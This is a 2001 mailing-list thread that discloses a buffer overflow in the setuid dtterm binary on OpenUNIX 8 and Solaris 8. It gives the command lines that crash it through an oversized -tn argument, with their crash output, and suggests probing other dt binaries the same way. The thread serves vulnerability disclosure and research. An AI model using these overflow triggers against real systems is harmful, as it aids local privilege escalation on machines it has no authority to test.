Re: OpenUNIX 8 & Unixware possible local root

[KF <dotslash () snosoft com>]

You guys should check ALL the dt suid / sgid against command line
HOME and TERM overflows ... as stated prior I have made ALL dt binarys
that 
are sgid / suid core on OpenUnix8 except dtmail which already had issues
I believe. 
-KF 


"Cushing, David" wrote:
> I was able to reproduce this on a Solaris 8 sparc machine with different
> tolerances:
>
> [288] uname -a
> SunOS hostname 5.8 Generic_108528-08 sun4u sparc SUNW,Ultra-60
> [289] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
> Segmentation Fault(coredump)
> [297] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x2083'`
> Bus Error(coredump)
> ginger:dcushing[298]
>
> -David
>
> > -----Original Message-----
> > From: Aycan Irican [mailto:aycan () mars prosoft com tr]
> > Sent: Tuesday, October 02, 2001 1:55 AM
> > To: bugtraq () securityfocus com
> > Cc: evrim () envy com tr
> > Subject: OpenUNIX 8 & Unixware possible local root
> >
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Another dt series bug...
> >
> > $ uname -a
> > OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
> > $ id
> > uid=101(fixxxer) gid=1(other)
> > $ ls -al /usr/dt/bin/dtterm
> > - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03
> > /usr/dt/bin/dtterm
> > $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
> > Warning: Missing charsets in String to FontSet conversion
> > Warning: Missing charsets in String to FontSet conversion
> > Memory fault
> > .. snip ..